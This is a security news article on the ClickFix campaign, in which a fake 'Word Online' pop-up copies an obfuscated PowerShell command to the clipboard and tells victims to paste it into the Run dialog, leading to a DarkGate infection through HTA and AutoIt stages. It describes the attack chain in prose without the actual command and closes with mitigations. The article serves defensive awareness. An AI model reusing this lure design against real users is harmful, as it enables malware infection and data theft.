ClickFix Disguises a Fake Word Online Message to Lure Victims into DarkGate Infection
Unlike typical malware that self-installs, ClickFix relies on user interaction, a deceptive “support-style” tactic that directly leads to a DarkGate malware infection.
The attack begins when users encounter a fake browser alert claiming that the “Word Online” extension is not installed.
A pop-up prompts them to click a “How to fix” button, supposedly to restore functionality. Behind this seemingly harmless message lies a malicious script embedded in the webpage’s HTML code.
Upon inspection, analysts discovered multiple layers of Base64-encoded and reversed strings, used to conceal a PowerShell command. When decoded, this command attempts to download an HTA (HTML Application) file from a remote server:
The malicious file is saved locally at C:UsersPublicnC.hta and executed via the Start-Process command, triggering the infection chain.
The PowerShell script also clears the clipboard (Set-Clipboard -Value” “) and ends its own session (exit) to hide traces and hinder analysis.
A JavaScript segment embedded in the same HTML page manages the user interface and clipboard activity. When the victim clicks the “How to fix” button, the malicious PowerShell command is copied to the clipboard.
Victims are then instructed to press Windows + R, open the Run dialog, and paste (CTRL + V) the copied command, thereby unknowingly executing malware instructions.
This user-driven execution downloads and launches dark.hta, which connects to a command-and-control (C2) server and retrieves additional scripts.
It creates directories on the C drive, drops an AutoIt script (.a3x), and executes it automatically to deploy further payloads.
Analysis of the fckhffh.a3x file indicates the use of the DES encryption algorithm, followed by the creation of a secondary DOS executable, believed to initiate DarkGate operations and data exfiltration routines.
Security telemetry links this activity to the following MITRE ATT&CK techniques:
Researchers warn that ClickFix evades detection because the user manually initiates the malicious command, making it appear legitimate to standard antivirus tools.
To stay protected, users should avoid copying code from pop-ups or websites offering quick “fixes.” Enterprises can mitigate risk by disabling the Windows Run command via Group Policy and enforcing an application allowlist.
Find this Story Interesting! Follow us on Google News , LinkedIn and X to Get More Instant Updates
The post ClickFix Disguises a Fake Word Online Message to Lure Victims into DarkGate Infection appeared first on Cyber Security News.
Here's a rare chance to pick up a massive, current generation, higher-end OLED TV at…
Apple recently unveiled its newest budget smartphone - the Apple iPhone 17e - on March…
A convincing fake website posing as the popular Mac utility CleanMyMac is actively pushing dangerous…
A new data-stealing malware called BoryptGrab has been quietly spreading across Windows systems through a…
The rumored "HomePod with a screen" we've heard so much about was reportedly lined up…
Department of Homeland Security. | Image: The Verge Chaos reigned at airports across the country…
This website uses cookies.